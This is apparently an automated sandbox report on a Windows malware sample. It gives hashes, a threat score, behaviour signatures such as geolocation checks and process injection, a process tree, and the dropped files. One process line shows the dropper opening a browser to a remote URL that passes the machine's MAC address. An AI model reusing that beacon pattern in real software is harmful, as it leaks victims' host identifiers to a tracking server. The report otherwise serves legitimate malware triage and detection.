Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/10/2024, 05:11

General

  • Target

    164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe

  • Size

    159KB

  • MD5

    164a91f2021d5a0f0df19e560468fab9

  • SHA1

    97157d2de5f371da509389dd93afa024e31a21eb

  • SHA256

    e8791bb4a0ac201d0810a8fcd91903c8887930e8542953336a147b637e344ed8

  • SHA512

    8d36ed5d0018cf3613780cf01500b1de5e9373ed37d9c3f515c43201212653f74fd5c189ab0b56f9e29439ee2603d15aca60950c1f0b71cfbdc36d6899b05d12

  • SSDEEP

    3072:vhT2137DYmJmw7DE1wy5itHx5xcezcTy2IwFf2mlkL7hQpXnYqzuA6FkepT:vhRjK6vY5P18y3wdlm705epT

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3680
    • C:\setup.exe
      "C:\setup.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4760
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.ok177.com/mini.html
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3352 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3716
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.ok177.com/tongji/g.asp?mac=66:FD:5B:E5:AD:11&id=admin2
        3⤵
        • Modifies Internet Explorer settings
        PID:4948
    • C:\net_setup.exe
      "C:\net_setup.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3844

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    db7c83e09ebc4317f2bf2df7f66b8513

    SHA1

    29d58ef43f72ce7cf79ce6109d038a6c9b4873f0

    SHA256

    1ae4c8aa37bf433bc5b3b45e017c95bf843c7dbbe348c78c7ab6f3cad0fda4b8

    SHA512

    6eb46ae0c3e091ba13b1c0e3fb6de568882940df7968d0e1297568ea5356a4691f2a869c7c9ac9e9642bcc2e4e1388d00b15c663276143e8cb5015ab89c27867

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    a49e7547d53767ee9065d5024381af26

    SHA1

    74f2db42cad9aa07320768292294271b8009ce42

    SHA256

    123590b618f80ca28f354e921b0f1be100d4f168d0b0812f360732a9b133b09d

    SHA512

    06d7f11a37c111e65e20012ff0ae629a55b8b3b3931e093c530ec44efff93021fc4aee3706ccad96895c21930b06cfd97fb6909716f8e04588f7fbb65647434e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G40JFEW9\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\net_setup.exe

    Filesize

    320KB

    MD5

    3bcee5c81e47f8bd3ac58d4e498012c3

    SHA1

    d1b3f136fe521d9ef2beeba789b19f9659ebd8fe

    SHA256

    e90d9f41cb2ebb43b0a103d0255f1f2f7dbe5c7d646df1ff5b679bca373775fe

    SHA512

    8651609b13a835030efacfd639844038dd250cb893842e97b38c786c2ede5ef155a8217f32f162d6c28a33425c0d04c95d7da1ad8c04c35a84158a997b9efea8

  • C:\setup.exe

    Filesize

    32KB

    MD5

    3ca2450fc36d7c1012e162c237326ca8

    SHA1

    705bd411569881666b931a39a13f07a27990b0fc

    SHA256

    9ac182116ec907469042cf11059afc77e2c3f3fb2ad5956e1008cfb73adcaf72

    SHA512

    f17f47321206ceee4b13239872db9da7754db21a35b2e0a24816e204946d5f45404df6bbce980266c8ccb04de5f3100611a7bbfda82f4679768f102ed7fcb7e7